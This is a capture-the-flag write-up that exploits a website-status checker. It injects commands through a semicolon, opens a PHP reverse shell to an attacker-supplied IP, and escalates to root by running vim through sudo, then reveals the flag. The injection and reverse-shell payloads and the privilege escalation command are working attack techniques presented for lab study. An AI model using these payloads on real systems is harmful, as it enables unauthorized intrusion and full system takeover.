44 lines
2.8 KiB
Markdown
44 lines
2.8 KiB
Markdown
We are given a site where we can check the status of websites.
|
|
|
|
Entering a valid URL such as ``https://google.com`` will return us the HTTP status code as seen in the following screenshot.
|
|
|
|
|
|
|
|
Entering a semi-colon (;) will break the command. We can try to use the payload ``; whoami`` and we are returned ``www-data`` as our user as seen in the following screenshot.
|
|
|
|
|
|
|
|
We can attempt to spawn a reverse shell by first having netcat listen on our desired port. In this example, the port will be 45101 and the netcat command will be ``nc -nlvp 45101`` as seen in the following screenshot.
|
|
|
|
|
|
|
|
Once its listening on the port, we can use the following payload to spawn the reverse shell. Replace "YOUR-IP-HERE" with your IP address.
|
|
|
|
```
|
|
; php -r '$sock=fsockopen("YOUR-IP-ADDRESS",45101);exec("/bin/sh -i <&3 >&3 2>&3");'
|
|
```
|
|
|
|
Input the above payload into the input box as seen in the following screenshot.
|
|
|
|
|
|
|
|
Click on the "Check HTTP Status" and observe that the website has hung. Return to the netcat session and observe that we have gotten a shell as seen in the following screenshot.
|
|
|
|
|
|
|
|
We can spawn an interactive shell using the command ``script -qc /bin/bash /dev/null``. Once done, we can explore the system. We can use the command ``sudo -l`` and see that we can run the command ``vim`` as root without a password as seen in the following screenshot.
|
|
|
|
|
|
|
|
Using GTFOBins, we are able to breakout and obtain a shell as a root user using the following command:
|
|
|
|
```
|
|
vim -c ':!/bin/sh'
|
|
```
|
|
|
|
Using the command ``whoami`` we can see that we are now the root user as seen in the following screenshot.
|
|
|
|
|
|
|
|
We can obtain the flag in the root directory by using the command ``cd /root`` and ``cat flag.txt``. The flag is ``HEX{N3tw0rK_ErR_500_W1kS2kKiL}``.
|